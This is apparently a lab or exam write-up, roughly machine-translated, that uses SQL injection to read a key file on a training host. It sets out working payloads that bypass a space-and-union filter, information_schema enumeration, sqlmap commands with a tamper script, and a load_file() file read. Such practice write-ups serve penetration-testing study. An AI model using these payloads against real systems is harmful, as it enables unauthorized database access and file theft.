当前位置:网站首页>SQL injection question type (manual injection +sqlmap)
SQL injection question type (manual injection +sqlmap)
2022-06-13 08:17:00 【BT youth】
subject : adopt SQL Injection vulnerability read /tmp/360/key file , The answer is in the file
Catalog
subject : adopt SQL Injection vulnerability read /tmp/360/key file , The answer is in the file
First of all to Manual injection ( use ’ as well as and perhaps or To check whether manual injection can be performed )


You can see id=1 Echo page for , Combined with the echo statement, it is found that the page is shielded union、<?php?>、 Space
therefore :
- use /**/ To display spaces
- use union Double writing bypasses
Input url:http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')#
The execution statement is :select * from article where id= ('1')#')
Go to order by Check field 、 The judgment is only 4 A field
http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4#
Show echo page
http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/5#
Do not display the echo page
And then use union Joint injection query :
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,3,4#

Perform explosion table, explosion library and field :(group_concat() function : Display the field contents of the branch as one line )
1、select group_concat(table_name) from information_schema.tables where table_schema=database()
- Name of Pop Watch :
- database :information_schema
- surface :tables
- Field :table_name
2、select group_concat(column_name) from information_schema.columns where table_name=' Table name '
- Pop field :
- database :infomation_schema
- surface :columns
- Field :column_name
It can be inferred that :
- Current database `2web`
- Current table article
- article Field has id,title,content,author
use sqlmap Tools For injection :(-u Specify injected site links ,--tamper Specify to prevent filtering of key characters , Such as spaces 、union)
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py"
The injection type is :boolean-based blind、time-based blind
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1028=1028 AND ('OXUg'='OXUg
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 7895 FROM (SELECT(SLEEP(5)))sSoM) AND ('YhuC'='YhuC
---List databases :
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" --dbs
List `2web` Tables in the database
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" -D `2web` --tables
List `2web` Database article What's in the table :
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" -D `2web` -T article --dump
Found no data to find , Return to the topic : adopt SQL Inject holes Read /tmp/360/key file , The answer is in the file .
The absolute path of a known file , Go straight ahead load_file() Function to view local files
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,load_file('/tmp/360/key'),4#

Finally found key8 Value
边栏推荐
- 【PYTORCH】RuntimeError: one of the variables needed for gradient computation has been
- [virt-manager]远程管理启动虚拟机时,鼠标飘逸的问题
- 钉钉小程序如何隐藏tab
- Live broadcast review | bas technology innovation exploration under active defense system
- Cosmos star module development
- How to hide tabs in nailing applet
- 平面合并(MATLAB)
- 【PYTORCH】Expected object of type torch. xxxTensor but found type torch. cuda. xxxTensor(torch0.4.0)
- Dfinity (ICP) basic development tutorial-5
- How to install the bdtab (BD) new tab plug-in in edge browser (Graphic tutorial)
猜你喜欢

获取类的属性

实践出真知--你的字节对齐和堆栈认知可能是错误的

CCNP_ Bt- Reissue

Operation of simulated examination platform for examination question bank of G3 boiler water treatment operation certificate in 2022

What software can be used to solve the problems faced by the auto parts industry

2022 electrician (elementary) examination questions and simulation examination

Several precise order receiving methods suitable for fresh food wholesale industry

ERP基础数据 华夏

Install cuda+cusp environment and create the first helloword starter project

ES6 deleting an attribute of an object
随机推荐
微服务项目搭建三:自动生成代码
How to efficiently manage commodities and inventory in the beverage wholesale industry
How to hide tabs in nailing applet
批发商为什么要使用订单系统
有什么好的管理软件来解决茶叶批发商面临的难题
Redis interview questions
CCNP_ BT-MGRE
Data disorder occurs when the n-th row of the subcomponent list generated by V-for is deleted
EHD ether coin, the hottest dpoc mining project
Leetcode- sort arrays by parity
将solidworks建的机器人模型导入到ros中
How to modify desktop path in win10 system
Do not update the sub component page of parameter object passed from parent to child of nailing applet?
SolidWorks修改工程图中文字字体的方法
Determination of ranking
汽配行业面临的难题用什么软件帮忙解决呢
【PYTORCH】Expected object of type torch. xxxTensor but found type torch. cuda. xxxTensor(torch0.4.0)
酒水批发行业应当如何高效管理商品与库存
Altium Designer中导入和导出设置的方法
Create a substrate private network

